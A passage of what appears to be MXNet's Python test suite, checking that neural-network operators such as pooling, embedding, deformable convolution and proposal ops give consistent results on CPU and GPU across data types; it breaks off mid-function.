ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
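# Sketch (ours) of our reading of the 'lp' pool_type exercised above with p_value in
# {1, 2, 3}: an Lp pooling window reduces its inputs to an Lp-norm-style quantity,
# (sum_i |x_i|**p) ** (1/p), so p=1 behaves like a sum of magnitudes and large p
# approaches max pooling. Treat this as an illustration, not the operator's exact kernel.
def _lp_pool_window_sketch(window, p):
    window = np.abs(np.asarray(window, dtype=np.float64))
    return float(np.power(np.sum(np.power(window, p)), 1.0 / p))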
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
@pytest.mark.skipif(os.environ.get('MXNET_ENGINE_TYPE') == 'NaiveEngine',
reason="Testing with naive engine consistently triggers illegal memory access. Tracked in #17713")
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
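# take above gathers along axis 0: out[i, ...] = a[indices[i, ...], ...], matching numpy's
# take for in-range indices. A one-line reference sketch (ours; the operator's out-of-range
# handling is not modeled here):
def _take_reference_sketch(a_np, idx_np):
    return np.take(a_np, idx_np.astype(np.int64), axis=0)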
@with_seed()
@pytest.mark.serial
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
@pytest.mark.serial
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
def check_rnn_layer(layer):
layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
@pytest.mark.serial
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
@pytest.mark.serial
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
@pytest.mark.serial
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
@pytest.mark.serial
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
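# The equality checked above is just the chain rule applied three times, independently of
# which device each tanh ran on. A small numpy cross-check sketch (ours, not part of the
# test): d/dx tanh(tanh(tanh(x))) = (1 - t3**2) * (1 - t2**2) * (1 - t1**2)
# with t1 = tanh(x), t2 = tanh(t1), t3 = tanh(t2).
def _triple_tanh_grad_sketch(x_np):
    t1 = np.tanh(x_np)
    t2 = np.tanh(t1)
    t3 = np.tanh(t2)
    return (1 - t3 ** 2) * (1 - t2 ** 2) * (1 - t1 ** 2)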
@with_seed()
@pytest.mark.serial
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
